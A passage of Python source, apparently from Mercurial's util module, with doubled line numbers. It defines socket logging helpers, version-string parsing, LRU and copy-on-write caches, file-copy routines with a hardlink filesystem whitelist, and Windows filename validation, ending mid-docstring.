1064 1064 % (self.name, len(data), flags, address, res)
1065 1065 )
1066 1066
1067 1067 self._writedata(data)
1068 1068
1069 1069 def setblocking(self, res, flag):
1070 1070 if not self.states:
1071 1071 return
1072 1072
1073 1073 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1074 1074
1075 1075 def settimeout(self, res, value):
1076 1076 if not self.states:
1077 1077 return
1078 1078
1079 1079 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1080 1080
1081 1081 def gettimeout(self, res):
1082 1082 if not self.states:
1083 1083 return
1084 1084
1085 1085 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1086 1086
1087 1087 def setsockopt(self, res, level, optname, value):
1088 1088 if not self.states:
1089 1089 return
1090 1090
1091 1091 self.fh.write(
1092 1092 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1093 1093 % (self.name, level, optname, value, res)
1094 1094 )
1095 1095
1096 1096
1097 1097 def makeloggingsocket(
1098 1098 logh,
1099 1099 fh,
1100 1100 name,
1101 1101 reads=True,
1102 1102 writes=True,
1103 1103 states=True,
1104 1104 logdata=False,
1105 1105 logdataapis=True,
1106 1106 ):
1107 1107 """Turn a socket into a logging socket."""
1108 1108
1109 1109 observer = socketobserver(
1110 1110 logh,
1111 1111 name,
1112 1112 reads=reads,
1113 1113 writes=writes,
1114 1114 states=states,
1115 1115 logdata=logdata,
1116 1116 logdataapis=logdataapis,
1117 1117 )
1118 1118 return socketproxy(fh, observer)
1119 1119
1120 1120
1121 1121 def version():
1122 1122 """Return version information if available."""
1123 1123 try:
1124 1124 from . import __version__
1125 1125
1126 1126 return __version__.version
1127 1127 except ImportError:
1128 1128 return b'unknown'
1129 1129
1130 1130
1131 1131 def versiontuple(v=None, n=4):
1132 1132 """Parses a Mercurial version string into an N-tuple.
1133 1133
1134 1134 The version string to be parsed is specified with the ``v`` argument.
1135 1135 If it isn't defined, the current Mercurial version string will be parsed.
1136 1136
1137 1137 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1138 1138 returned values:
1139 1139
1140 1140 >>> v = b'3.6.1+190-df9b73d2d444'
1141 1141 >>> versiontuple(v, 2)
1142 1142 (3, 6)
1143 1143 >>> versiontuple(v, 3)
1144 1144 (3, 6, 1)
1145 1145 >>> versiontuple(v, 4)
1146 1146 (3, 6, 1, '190-df9b73d2d444')
1147 1147
1148 1148 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1149 1149 (3, 6, 1, '190-df9b73d2d444+20151118')
1150 1150
1151 1151 >>> v = b'3.6'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, None)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, None, None)
1158 1158
1159 1159 >>> v = b'3.9-rc'
1160 1160 >>> versiontuple(v, 2)
1161 1161 (3, 9)
1162 1162 >>> versiontuple(v, 3)
1163 1163 (3, 9, None)
1164 1164 >>> versiontuple(v, 4)
1165 1165 (3, 9, None, 'rc')
1166 1166
1167 1167 >>> v = b'3.9-rc+2-02a8fea4289b'
1168 1168 >>> versiontuple(v, 2)
1169 1169 (3, 9)
1170 1170 >>> versiontuple(v, 3)
1171 1171 (3, 9, None)
1172 1172 >>> versiontuple(v, 4)
1173 1173 (3, 9, None, 'rc+2-02a8fea4289b')
1174 1174
1175 1175 >>> versiontuple(b'4.6rc0')
1176 1176 (4, 6, None, 'rc0')
1177 1177 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1178 1178 (4, 6, None, 'rc0+12-425d55e54f98')
1179 1179 >>> versiontuple(b'.1.2.3')
1180 1180 (None, None, None, '.1.2.3')
1181 1181 >>> versiontuple(b'12.34..5')
1182 1182 (12, 34, None, '..5')
1183 1183 >>> versiontuple(b'1.2.3.4.5.6')
1184 1184 (1, 2, 3, '.4.5.6')
1185 1185 """
1186 1186 if not v:
1187 1187 v = version()
1188 1188 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1189 1189 if not m:
1190 1190 vparts, extra = b'', v
1191 1191 elif m.group(2):
1192 1192 vparts, extra = m.groups()
1193 1193 else:
1194 1194 vparts, extra = m.group(1), None
1195 1195
1196 1196 assert vparts is not None # help pytype
1197 1197
1198 1198 vints = []
1199 1199 for i in vparts.split(b'.'):
1200 1200 try:
1201 1201 vints.append(int(i))
1202 1202 except ValueError:
1203 1203 break
1204 1204 # (3, 6) -> (3, 6, None)
1205 1205 while len(vints) < 3:
1206 1206 vints.append(None)
1207 1207
1208 1208 if n == 2:
1209 1209 return (vints[0], vints[1])
1210 1210 if n == 3:
1211 1211 return (vints[0], vints[1], vints[2])
1212 1212 if n == 4:
1213 1213 return (vints[0], vints[1], vints[2], extra)
1214 1214
1215 1215
1216 1216 def cachefunc(func):
1217 1217 '''cache the result of function calls'''
1218 1218 # XXX doesn't handle keywords args
1219 1219 if func.__code__.co_argcount == 0:
1220 1220 listcache = []
1221 1221
1222 1222 def f():
1223 1223 if len(listcache) == 0:
1224 1224 listcache.append(func())
1225 1225 return listcache[0]
1226 1226
1227 1227 return f
1228 1228 cache = {}
1229 1229 if func.__code__.co_argcount == 1:
1230 1230 # we gain a small amount of time because
1231 1231 # we don't need to pack/unpack the list
1232 1232 def f(arg):
1233 1233 if arg not in cache:
1234 1234 cache[arg] = func(arg)
1235 1235 return cache[arg]
1236 1236
1237 1237 else:
1238 1238
1239 1239 def f(*args):
1240 1240 if args not in cache:
1241 1241 cache[args] = func(*args)
1242 1242 return cache[args]
1243 1243
1244 1244 return f
1245 1245
1246 1246
1247 1247 class cow(object):
1248 1248 """helper class to make copy-on-write easier
1249 1249
1250 1250 Call preparewrite before doing any writes.
1251 1251 """
1252 1252
1253 1253 def preparewrite(self):
1254 1254 """call this before writes, return self or a copied new object"""
1255 1255 if getattr(self, '_copied', 0):
1256 1256 self._copied -= 1
1257 1257 return self.__class__(self)
1258 1258 return self
1259 1259
1260 1260 def copy(self):
1261 1261 """always do a cheap copy"""
1262 1262 self._copied = getattr(self, '_copied', 0) + 1
1263 1263 return self
1264 1264
1265 1265
1266 1266 class sortdict(collections.OrderedDict):
1267 1267 """a simple sorted dictionary
1268 1268
1269 1269 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1270 1270 >>> d2 = d1.copy()
1271 1271 >>> d2
1272 1272 sortdict([('a', 0), ('b', 1)])
1273 1273 >>> d2.update([(b'a', 2)])
1274 1274 >>> list(d2.keys()) # should still be in last-set order
1275 1275 ['b', 'a']
1276 1276 >>> d1.insert(1, b'a.5', 0.5)
1277 1277 >>> d1
1278 1278 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1279 1279 """
1280 1280
1281 1281 def __setitem__(self, key, value):
1282 1282 if key in self:
1283 1283 del self[key]
1284 1284 super(sortdict, self).__setitem__(key, value)
1285 1285
1286 1286 if pycompat.ispypy:
1287 1287 # __setitem__() isn't called as of PyPy 5.8.0
1288 1288 def update(self, src):
1289 1289 if isinstance(src, dict):
1290 1290 src = pycompat.iteritems(src)
1291 1291 for k, v in src:
1292 1292 self[k] = v
1293 1293
1294 1294 def insert(self, position, key, value):
1295 1295 for (i, (k, v)) in enumerate(list(self.items())):
1296 1296 if i == position:
1297 1297 self[key] = value
1298 1298 if i >= position:
1299 1299 del self[k]
1300 1300 self[k] = v
1301 1301
1302 1302
1303 1303 class cowdict(cow, dict):
1304 1304 """copy-on-write dict
1305 1305
1306 1306 Be sure to call d = d.preparewrite() before writing to d.
1307 1307
1308 1308 >>> a = cowdict()
1309 1309 >>> a is a.preparewrite()
1310 1310 True
1311 1311 >>> b = a.copy()
1312 1312 >>> b is a
1313 1313 True
1314 1314 >>> c = b.copy()
1315 1315 >>> c is a
1316 1316 True
1317 1317 >>> a = a.preparewrite()
1318 1318 >>> b is a
1319 1319 False
1320 1320 >>> a is a.preparewrite()
1321 1321 True
1322 1322 >>> c = c.preparewrite()
1323 1323 >>> b is c
1324 1324 False
1325 1325 >>> b is b.preparewrite()
1326 1326 True
1327 1327 """
1328 1328
1329 1329
1330 1330 class cowsortdict(cow, sortdict):
1331 1331 """copy-on-write sortdict
1332 1332
1333 1333 Be sure to call d = d.preparewrite() before writing to d.
1334 1334 """
1335 1335
1336 1336
1337 1337 class transactional(object): # pytype: disable=ignored-metaclass
1338 1338 """Base class for making a transactional type into a context manager."""
1339 1339
1340 1340 __metaclass__ = abc.ABCMeta
1341 1341
1342 1342 @abc.abstractmethod
1343 1343 def close(self):
1344 1344 """Successfully closes the transaction."""
1345 1345
1346 1346 @abc.abstractmethod
1347 1347 def release(self):
1348 1348 """Marks the end of the transaction.
1349 1349
1350 1350 If the transaction has not been closed, it will be aborted.
1351 1351 """
1352 1352
1353 1353 def __enter__(self):
1354 1354 return self
1355 1355
1356 1356 def __exit__(self, exc_type, exc_val, exc_tb):
1357 1357 try:
1358 1358 if exc_type is None:
1359 1359 self.close()
1360 1360 finally:
1361 1361 self.release()
1362 1362
1363 1363
1364 1364 @contextlib.contextmanager
1365 1365 def acceptintervention(tr=None):
1366 1366 """A context manager that closes the transaction on InterventionRequired
1367 1367
1368 1368 If no transaction was provided, this simply runs the body and returns
1369 1369 """
1370 1370 if not tr:
1371 1371 yield
1372 1372 return
1373 1373 try:
1374 1374 yield
1375 1375 tr.close()
1376 1376 except error.InterventionRequired:
1377 1377 tr.close()
1378 1378 raise
1379 1379 finally:
1380 1380 tr.release()
1381 1381
1382 1382
1383 1383 @contextlib.contextmanager
1384 1384 def nullcontextmanager(enter_result=None):
1385 1385 yield enter_result
1386 1386
1387 1387
1388 1388 class _lrucachenode(object):
1389 1389 """A node in a doubly linked list.
1390 1390
1391 1391 Holds a reference to nodes on either side as well as a key-value
1392 1392 pair for the dictionary entry.
1393 1393 """
1394 1394
1395 1395 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1396 1396
1397 1397 def __init__(self):
1398 1398 self.next = None
1399 1399 self.prev = None
1400 1400
1401 1401 self.key = _notset
1402 1402 self.value = None
1403 1403 self.cost = 0
1404 1404
1405 1405 def markempty(self):
1406 1406 """Mark the node as emptied."""
1407 1407 self.key = _notset
1408 1408 self.value = None
1409 1409 self.cost = 0
1410 1410
1411 1411
1412 1412 class lrucachedict(object):
1413 1413 """Dict that caches most recent accesses and sets.
1414 1414
1415 1415 The dict consists of an actual backing dict - indexed by original
1416 1416 key - and a doubly linked circular list defining the order of entries in
1417 1417 the cache.
1418 1418
1419 1419 The head node is the newest entry in the cache. If the cache is full,
1420 1420 we recycle head.prev and make it the new head. Cache accesses result in
1421 1421 the node being moved to before the existing head and being marked as the
1422 1422 new head node.
1423 1423
1424 1424 Items in the cache can be inserted with an optional "cost" value. This is
1425 1425 simply an integer that is specified by the caller. The cache can be queried
1426 1426 for the total cost of all items presently in the cache.
1427 1427
1428 1428 The cache can also define a maximum cost. If a cache insertion would
1429 1429 cause the total cost of the cache to go beyond the maximum cost limit,
1430 1430 nodes will be evicted to make room for the new code. This can be used
1431 1431 to e.g. set a max memory limit and associate an estimated bytes size
1432 1432 cost to each item in the cache. By default, no maximum cost is enforced.
1433 1433 """
1434 1434
1435 1435 def __init__(self, max, maxcost=0):
1436 1436 self._cache = {}
1437 1437
1438 1438 self._head = head = _lrucachenode()
1439 1439 head.prev = head
1440 1440 head.next = head
1441 1441 self._size = 1
1442 1442 self.capacity = max
1443 1443 self.totalcost = 0
1444 1444 self.maxcost = maxcost
1445 1445
1446 1446 def __len__(self):
1447 1447 return len(self._cache)
1448 1448
1449 1449 def __contains__(self, k):
1450 1450 return k in self._cache
1451 1451
1452 1452 def __iter__(self):
1453 1453 # We don't have to iterate in cache order, but why not.
1454 1454 n = self._head
1455 1455 for i in range(len(self._cache)):
1456 1456 yield n.key
1457 1457 n = n.next
1458 1458
1459 1459 def __getitem__(self, k):
1460 1460 node = self._cache[k]
1461 1461 self._movetohead(node)
1462 1462 return node.value
1463 1463
1464 1464 def insert(self, k, v, cost=0):
1465 1465 """Insert a new item in the cache with optional cost value."""
1466 1466 node = self._cache.get(k)
1467 1467 # Replace existing value and mark as newest.
1468 1468 if node is not None:
1469 1469 self.totalcost -= node.cost
1470 1470 node.value = v
1471 1471 node.cost = cost
1472 1472 self.totalcost += cost
1473 1473 self._movetohead(node)
1474 1474
1475 1475 if self.maxcost:
1476 1476 self._enforcecostlimit()
1477 1477
1478 1478 return
1479 1479
1480 1480 if self._size < self.capacity:
1481 1481 node = self._addcapacity()
1482 1482 else:
1483 1483 # Grab the last/oldest item.
1484 1484 node = self._head.prev
1485 1485
1486 1486 # At capacity. Kill the old entry.
1487 1487 if node.key is not _notset:
1488 1488 self.totalcost -= node.cost
1489 1489 del self._cache[node.key]
1490 1490
1491 1491 node.key = k
1492 1492 node.value = v
1493 1493 node.cost = cost
1494 1494 self.totalcost += cost
1495 1495 self._cache[k] = node
1496 1496 # And mark it as newest entry. No need to adjust order since it
1497 1497 # is already self._head.prev.
1498 1498 self._head = node
1499 1499
1500 1500 if self.maxcost:
1501 1501 self._enforcecostlimit()
1502 1502
1503 1503 def __setitem__(self, k, v):
1504 1504 self.insert(k, v)
1505 1505
1506 1506 def __delitem__(self, k):
1507 1507 self.pop(k)
1508 1508
1509 1509 def pop(self, k, default=_notset):
1510 1510 try:
1511 1511 node = self._cache.pop(k)
1512 1512 except KeyError:
1513 1513 if default is _notset:
1514 1514 raise
1515 1515 return default
1516 1516
1517 1517 assert node is not None # help pytype
1518 1518 value = node.value
1519 1519 self.totalcost -= node.cost
1520 1520 node.markempty()
1521 1521
1522 1522 # Temporarily mark as newest item before re-adjusting head to make
1523 1523 # this node the oldest item.
1524 1524 self._movetohead(node)
1525 1525 self._head = node.next
1526 1526
1527 1527 return value
1528 1528
1529 1529 # Additional dict methods.
1530 1530
1531 1531 def get(self, k, default=None):
1532 1532 try:
1533 1533 return self.__getitem__(k)
1534 1534 except KeyError:
1535 1535 return default
1536 1536
1537 1537 def peek(self, k, default=_notset):
1538 1538 """Get the specified item without moving it to the head
1539 1539
1540 1540 Unlike get(), this doesn't mutate the internal state. But be aware
1541 1541 that it doesn't mean peek() is thread safe.
1542 1542 """
1543 1543 try:
1544 1544 node = self._cache[k]
1545 1545 return node.value
1546 1546 except KeyError:
1547 1547 if default is _notset:
1548 1548 raise
1549 1549 return default
1550 1550
1551 1551 def clear(self):
1552 1552 n = self._head
1553 1553 while n.key is not _notset:
1554 1554 self.totalcost -= n.cost
1555 1555 n.markempty()
1556 1556 n = n.next
1557 1557
1558 1558 self._cache.clear()
1559 1559
1560 1560 def copy(self, capacity=None, maxcost=0):
1561 1561 """Create a new cache as a copy of the current one.
1562 1562
1563 1563 By default, the new cache has the same capacity as the existing one.
1564 1564 But, the cache capacity can be changed as part of performing the
1565 1565 copy.
1566 1566
1567 1567 Items in the copy have an insertion/access order matching this
1568 1568 instance.
1569 1569 """
1570 1570
1571 1571 capacity = capacity or self.capacity
1572 1572 maxcost = maxcost or self.maxcost
1573 1573 result = lrucachedict(capacity, maxcost=maxcost)
1574 1574
1575 1575 # We copy entries by iterating in oldest-to-newest order so the copy
1576 1576 # has the correct ordering.
1577 1577
1578 1578 # Find the first non-empty entry.
1579 1579 n = self._head.prev
1580 1580 while n.key is _notset and n is not self._head:
1581 1581 n = n.prev
1582 1582
1583 1583 # We could potentially skip the first N items when decreasing capacity.
1584 1584 # But let's keep it simple unless it is a performance problem.
1585 1585 for i in range(len(self._cache)):
1586 1586 result.insert(n.key, n.value, cost=n.cost)
1587 1587 n = n.prev
1588 1588
1589 1589 return result
1590 1590
1591 1591 def popoldest(self):
1592 1592 """Remove the oldest item from the cache.
1593 1593
1594 1594 Returns the (key, value) describing the removed cache entry.
1595 1595 """
1596 1596 if not self._cache:
1597 1597 return
1598 1598
1599 1599 # Walk the linked list backwards starting at tail node until we hit
1600 1600 # a non-empty node.
1601 1601 n = self._head.prev
1602 1602 while n.key is _notset:
1603 1603 n = n.prev
1604 1604
1605 1605 assert n is not None # help pytype
1606 1606
1607 1607 key, value = n.key, n.value
1608 1608
1609 1609 # And remove it from the cache and mark it as empty.
1610 1610 del self._cache[n.key]
1611 1611 self.totalcost -= n.cost
1612 1612 n.markempty()
1613 1613
1614 1614 return key, value
1615 1615
1616 1616 def _movetohead(self, node):
1617 1617 """Mark a node as the newest, making it the new head.
1618 1618
1619 1619 When a node is accessed, it becomes the freshest entry in the LRU
1620 1620 list, which is denoted by self._head.
1621 1621
1622 1622 Visually, let's make ``N`` the new head node (* denotes head):
1623 1623
1624 1624 previous/oldest <-> head <-> next/next newest
1625 1625
1626 1626 ----<->--- A* ---<->-----
1627 1627 | |
1628 1628 E <-> D <-> N <-> C <-> B
1629 1629
1630 1630 To:
1631 1631
1632 1632 ----<->--- N* ---<->-----
1633 1633 | |
1634 1634 E <-> D <-> C <-> B <-> A
1635 1635
1636 1636 This requires the following moves:
1637 1637
1638 1638 C.next = D (node.prev.next = node.next)
1639 1639 D.prev = C (node.next.prev = node.prev)
1640 1640 E.next = N (head.prev.next = node)
1641 1641 N.prev = E (node.prev = head.prev)
1642 1642 N.next = A (node.next = head)
1643 1643 A.prev = N (head.prev = node)
1644 1644 """
1645 1645 head = self._head
1646 1646 # C.next = D
1647 1647 node.prev.next = node.next
1648 1648 # D.prev = C
1649 1649 node.next.prev = node.prev
1650 1650 # N.prev = E
1651 1651 node.prev = head.prev
1652 1652 # N.next = A
1653 1653 # It is tempting to do just "head" here, however if node is
1654 1654 # adjacent to head, this will do bad things.
1655 1655 node.next = head.prev.next
1656 1656 # E.next = N
1657 1657 node.next.prev = node
1658 1658 # A.prev = N
1659 1659 node.prev.next = node
1660 1660
1661 1661 self._head = node
1662 1662
1663 1663 def _addcapacity(self):
1664 1664 """Add a node to the circular linked list.
1665 1665
1666 1666 The new node is inserted before the head node.
1667 1667 """
1668 1668 head = self._head
1669 1669 node = _lrucachenode()
1670 1670 head.prev.next = node
1671 1671 node.prev = head.prev
1672 1672 node.next = head
1673 1673 head.prev = node
1674 1674 self._size += 1
1675 1675 return node
1676 1676
1677 1677 def _enforcecostlimit(self):
1678 1678 # This should run after an insertion. It should only be called if total
1679 1679 # cost limits are being enforced.
1680 1680 # The most recently inserted node is never evicted.
1681 1681 if len(self) <= 1 or self.totalcost <= self.maxcost:
1682 1682 return
1683 1683
1684 1684 # This is logically equivalent to calling popoldest() until we
1685 1685 # free up enough cost. We don't do that since popoldest() needs
1686 1686 # to walk the linked list and doing this in a loop would be
1687 1687 # quadratic. So we find the first non-empty node and then
1688 1688 # walk nodes until we free up enough capacity.
1689 1689 #
1690 1690 # If we only removed the minimum number of nodes to free enough
1691 1691 # cost at insert time, chances are high that the next insert would
1692 1692 # also require pruning. This would effectively constitute quadratic
1693 1693 # behavior for insert-heavy workloads. To mitigate this, we set a
1694 1694 # target cost that is a percentage of the max cost. This will tend
1695 1695 # to free more nodes when the high water mark is reached, which
1696 1696 # lowers the chances of needing to prune on the subsequent insert.
1697 1697 targetcost = int(self.maxcost * 0.75)
1698 1698
1699 1699 n = self._head.prev
1700 1700 while n.key is _notset:
1701 1701 n = n.prev
1702 1702
1703 1703 while len(self) > 1 and self.totalcost > targetcost:
1704 1704 del self._cache[n.key]
1705 1705 self.totalcost -= n.cost
1706 1706 n.markempty()
1707 1707 n = n.prev
1708 1708
1709 1709
1710 1710 def lrucachefunc(func):
1711 1711 '''cache most recent results of function calls'''
1712 1712 cache = {}
1713 1713 order = collections.deque()
1714 1714 if func.__code__.co_argcount == 1:
1715 1715
1716 1716 def f(arg):
1717 1717 if arg not in cache:
1718 1718 if len(cache) > 20:
1719 1719 del cache[order.popleft()]
1720 1720 cache[arg] = func(arg)
1721 1721 else:
1722 1722 order.remove(arg)
1723 1723 order.append(arg)
1724 1724 return cache[arg]
1725 1725
1726 1726 else:
1727 1727
1728 1728 def f(*args):
1729 1729 if args not in cache:
1730 1730 if len(cache) > 20:
1731 1731 del cache[order.popleft()]
1732 1732 cache[args] = func(*args)
1733 1733 else:
1734 1734 order.remove(args)
1735 1735 order.append(args)
1736 1736 return cache[args]
1737 1737
1738 1738 return f
1739 1739
1740 1740
1741 1741 class propertycache(object):
1742 1742 def __init__(self, func):
1743 1743 self.func = func
1744 1744 self.name = func.__name__
1745 1745
1746 1746 def __get__(self, obj, type=None):
1747 1747 result = self.func(obj)
1748 1748 self.cachevalue(obj, result)
1749 1749 return result
1750 1750
1751 1751 def cachevalue(self, obj, value):
1752 1752 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1753 1753 obj.__dict__[self.name] = value
1754 1754
1755 1755
1756 1756 def clearcachedproperty(obj, prop):
1757 1757 '''clear a cached property value, if one has been set'''
1758 1758 prop = pycompat.sysstr(prop)
1759 1759 if prop in obj.__dict__:
1760 1760 del obj.__dict__[prop]
1761 1761
1762 1762
1763 1763 def increasingchunks(source, min=1024, max=65536):
1764 1764 """return no less than min bytes per chunk while data remains,
1765 1765 doubling min after each chunk until it reaches max"""
1766 1766
1767 1767 def log2(x):
1768 1768 if not x:
1769 1769 return 0
1770 1770 i = 0
1771 1771 while x:
1772 1772 x >>= 1
1773 1773 i += 1
1774 1774 return i - 1
1775 1775
1776 1776 buf = []
1777 1777 blen = 0
1778 1778 for chunk in source:
1779 1779 buf.append(chunk)
1780 1780 blen += len(chunk)
1781 1781 if blen >= min:
1782 1782 if min < max:
1783 1783 min = min << 1
1784 1784 nmin = 1 << log2(blen)
1785 1785 if nmin > min:
1786 1786 min = nmin
1787 1787 if min > max:
1788 1788 min = max
1789 1789 yield b''.join(buf)
1790 1790 blen = 0
1791 1791 buf = []
1792 1792 if buf:
1793 1793 yield b''.join(buf)
1794 1794
1795 1795
1796 1796 def always(fn):
1797 1797 return True
1798 1798
1799 1799
1800 1800 def never(fn):
1801 1801 return False
1802 1802
1803 1803
1804 1804 def nogc(func):
1805 1805 """disable garbage collector
1806 1806
1807 1807 Python's garbage collector triggers a GC each time a certain number of
1808 1808 container objects (the number being defined by gc.get_threshold()) are
1809 1809 allocated even when marked not to be tracked by the collector. Tracking has
1810 1810 no effect on when GCs are triggered, only on what objects the GC looks
1811 1811 into. As a workaround, disable GC while building complex (huge)
1812 1812 containers.
1813 1813
1814 1814 This garbage collector issue have been fixed in 2.7. But it still affect
1815 1815 CPython's performance.
1816 1816 """
1817 1817
1818 1818 def wrapper(*args, **kwargs):
1819 1819 gcenabled = gc.isenabled()
1820 1820 gc.disable()
1821 1821 try:
1822 1822 return func(*args, **kwargs)
1823 1823 finally:
1824 1824 if gcenabled:
1825 1825 gc.enable()
1826 1826
1827 1827 return wrapper
1828 1828
1829 1829
1830 1830 if pycompat.ispypy:
1831 1831 # PyPy runs slower with gc disabled
1832 1832 nogc = lambda x: x
1833 1833
1834 1834
1835 1835 def pathto(root, n1, n2):
1836 1836 """return the relative path from one place to another.
1837 1837 root should use os.sep to separate directories
1838 1838 n1 should use os.sep to separate directories
1839 1839 n2 should use "/" to separate directories
1840 1840 returns an os.sep-separated path.
1841 1841
1842 1842 If n1 is a relative path, it's assumed it's
1843 1843 relative to root.
1844 1844 n2 should always be relative to root.
1845 1845 """
1846 1846 if not n1:
1847 1847 return localpath(n2)
1848 1848 if os.path.isabs(n1):
1849 1849 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1850 1850 return os.path.join(root, localpath(n2))
1851 1851 n2 = b'/'.join((pconvert(root), n2))
1852 1852 a, b = splitpath(n1), n2.split(b'/')
1853 1853 a.reverse()
1854 1854 b.reverse()
1855 1855 while a and b and a[-1] == b[-1]:
1856 1856 a.pop()
1857 1857 b.pop()
1858 1858 b.reverse()
1859 1859 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1860 1860
1861 1861
1862 1862 def checksignature(func, depth=1):
1863 1863 '''wrap a function with code to check for calling errors'''
1864 1864
1865 1865 def check(*args, **kwargs):
1866 1866 try:
1867 1867 return func(*args, **kwargs)
1868 1868 except TypeError:
1869 1869 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1870 1870 raise error.SignatureError
1871 1871 raise
1872 1872
1873 1873 return check
1874 1874
1875 1875
1876 1876 # a whilelist of known filesystems where hardlink works reliably
1877 1877 _hardlinkfswhitelist = {
1878 1878 b'apfs',
1879 1879 b'btrfs',
1880 1880 b'ext2',
1881 1881 b'ext3',
1882 1882 b'ext4',
1883 1883 b'hfs',
1884 1884 b'jfs',
1885 1885 b'NTFS',
1886 1886 b'reiserfs',
1887 1887 b'tmpfs',
1888 1888 b'ufs',
1889 1889 b'xfs',
1890 1890 b'zfs',
1891 1891 }
1892 1892
1893 1893
1894 1894 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1895 1895 """copy a file, preserving mode and optionally other stat info like
1896 1896 atime/mtime
1897 1897
1898 1898 checkambig argument is used with filestat, and is useful only if
1899 1899 destination file is guarded by any lock (e.g. repo.lock or
1900 1900 repo.wlock).
1901 1901
1902 1902 copystat and checkambig should be exclusive.
1903 1903 """
1904 1904 assert not (copystat and checkambig)
1905 1905 oldstat = None
1906 1906 if os.path.lexists(dest):
1907 1907 if checkambig:
1908 1908 oldstat = checkambig and filestat.frompath(dest)
1909 1909 unlink(dest)
1910 1910 if hardlink:
1911 1911 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1912 1912 # unless we are confident that dest is on a whitelisted filesystem.
1913 1913 try:
1914 1914 fstype = getfstype(os.path.dirname(dest))
1915 1915 except OSError:
1916 1916 fstype = None
1917 1917 if fstype not in _hardlinkfswhitelist:
1918 1918 hardlink = False
1919 1919 if hardlink:
1920 1920 try:
1921 1921 oslink(src, dest)
1922 1922 return
1923 1923 except (IOError, OSError):
1924 1924 pass # fall back to normal copy
1925 1925 if os.path.islink(src):
1926 1926 os.symlink(os.readlink(src), dest)
1927 1927 # copytime is ignored for symlinks, but in general copytime isn't needed
1928 1928 # for them anyway
1929 1929 else:
1930 1930 try:
1931 1931 shutil.copyfile(src, dest)
1932 1932 if copystat:
1933 1933 # copystat also copies mode
1934 1934 shutil.copystat(src, dest)
1935 1935 else:
1936 1936 shutil.copymode(src, dest)
1937 1937 if oldstat and oldstat.stat:
1938 1938 newstat = filestat.frompath(dest)
1939 1939 if newstat.isambig(oldstat):
1940 1940 # stat of copied file is ambiguous to original one
1941 1941 advanced = (
1942 1942 oldstat.stat[stat.ST_MTIME] + 1
1943 1943 ) & 0x7FFFFFFF
1944 1944 os.utime(dest, (advanced, advanced))
1945 1945 except shutil.Error as inst:
1946 1946 raise error.Abort(stringutil.forcebytestr(inst))
1947 1947
1948 1948
1949 1949 def copyfiles(src, dst, hardlink=None, progress=None):
1950 1950 """Copy a directory tree using hardlinks if possible."""
1951 1951 num = 0
1952 1952
1953 1953 def settopic():
1954 1954 if progress:
1955 1955 progress.topic = _(b'linking') if hardlink else _(b'copying')
1956 1956
1957 1957 if os.path.isdir(src):
1958 1958 if hardlink is None:
1959 1959 hardlink = (
1960 1960 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1961 1961 )
1962 1962 settopic()
1963 1963 os.mkdir(dst)
1964 1964 for name, kind in listdir(src):
1965 1965 srcname = os.path.join(src, name)
1966 1966 dstname = os.path.join(dst, name)
1967 1967 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1968 1968 num += n
1969 1969 else:
1970 1970 if hardlink is None:
1971 1971 hardlink = (
1972 1972 os.stat(os.path.dirname(src)).st_dev
1973 1973 == os.stat(os.path.dirname(dst)).st_dev
1974 1974 )
1975 1975 settopic()
1976 1976
1977 1977 if hardlink:
1978 1978 try:
1979 1979 oslink(src, dst)
1980 1980 except (IOError, OSError):
1981 1981 hardlink = False
1982 1982 shutil.copy(src, dst)
1983 1983 else:
1984 1984 shutil.copy(src, dst)
1985 1985 num += 1
1986 1986 if progress:
1987 1987 progress.increment()
1988 1988
1989 1989 return hardlink, num
1990 1990
1991 1991
1992 1992 _winreservednames = {
1993 1993 b'con',
1994 1994 b'prn',
1995 1995 b'aux',
1996 1996 b'nul',
1997 1997 b'com1',
1998 1998 b'com2',
1999 1999 b'com3',
2000 2000 b'com4',
2001 2001 b'com5',
2002 2002 b'com6',
2003 2003 b'com7',
2004 2004 b'com8',
2005 2005 b'com9',
2006 2006 b'lpt1',
2007 2007 b'lpt2',
2008 2008 b'lpt3',
2009 2009 b'lpt4',
2010 2010 b'lpt5',
2011 2011 b'lpt6',
2012 2012 b'lpt7',
2013 2013 b'lpt8',
2014 2014 b'lpt9',
2015 2015 }
2016 2016 _winreservedchars = b':*?"<>|'
2017 2017
2018 2018
2019 2019 def checkwinfilename(path):
2020 2020 r"""Check that the base-relative path is a valid filename on Windows.
2021 2021 Returns None if the path is ok, or a UI string describing the problem.
2022 2022
2023 2023 >>> checkwinfilename(b"just/a/normal/path")
2024 2024 >>> checkwinfilename(b"foo/bar/con.xml")
2025 2025 "filename contains 'con', which is reserved on Windows"
2026 2026 >>> checkwinfilename(b"foo/con.xml/bar")
2027 2027 "filename contains 'con', which is reserved on Windows"
2028 2028 >>> checkwinfilename(b"foo/bar/xml.con")
2029 2029 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2030 2030 "filename contains 'AUX', which is reserved on Windows"
2031 2031 >>> checkwinfilename(b"foo/bar/bla:.txt")
2032 2032 "filename contains ':', which is reserved on Windows"
2033 2033 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2034 2034 "filename contains '\\x07', which is invalid on Windows"
2035 2035 >>> checkwinfilename(b"foo/bar/bla ")
2036 2036 "filename ends with ' ', which is not allowed on Windows"
2037 2037 >>> checkwinfilename(b"../bar")
2038 2038 >>> checkwinfilename(b"foo\\")
2039 2039 "filename ends with '\\', which is invalid on Windows"
